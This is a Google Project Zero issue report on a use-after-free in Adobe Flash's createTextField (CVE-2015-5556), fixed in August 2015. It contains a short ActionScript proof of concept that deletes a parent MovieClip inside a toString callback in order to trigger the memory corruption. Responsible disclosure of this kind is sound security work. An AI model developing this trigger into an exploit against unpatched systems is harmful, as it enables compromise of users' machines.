408 - Adobe Flash: Use-after-free in createTextField - project-zero

Starred by 2 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Aug 2015
Cc:	project-...@google.com
Finder-natashenka Deadline-90 Id-3768 CVE-2015-5556 Reported-2015-May-29 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: Use-after-free in createTextField

Project Member Reported by natashenka@google.com, May 27 2015

Back to list

There is a use-after-free in CreateTextField. If a flash file contains a MovieClip heirarcy, such as:

_root-->l1-->l2-->l3

If createTextField is called on l2 to create l3, and the call makes a call into a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:

var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);

function strfunc(){
	
	l2.removeMovieClip();
	return "myname";
	
	}

A sample SWF and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

ctf.fla
4.6 KB Download

ctf.swf
711 bytes Download

Project Member Comment 1 by scvitti@google.com, May 28 2015

Labels: -Reported-2015-05-27 Reported-2015-May-27

Project Member Comment 2 by natashenka@google.com, May 29 2015

Labels: -Reported-2015-May-27 Reported-2015-May-29

Project Member Comment 3 by natashenka@google.com, Jun 1 2015

This is PSIRT-3768

Project Member Comment 4 by natashenka@google.com, Aug 11 2015

Labels: Id-3768 CVE-2015-5556

Project Member Comment 5 by natashenka@google.com, Aug 11 2015

Status: Fixed

Project Member Comment 6 by natashenka@google.com, Aug 18 2015

Labels: -Restrict-View-Commit

Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

► Sign in to add a comment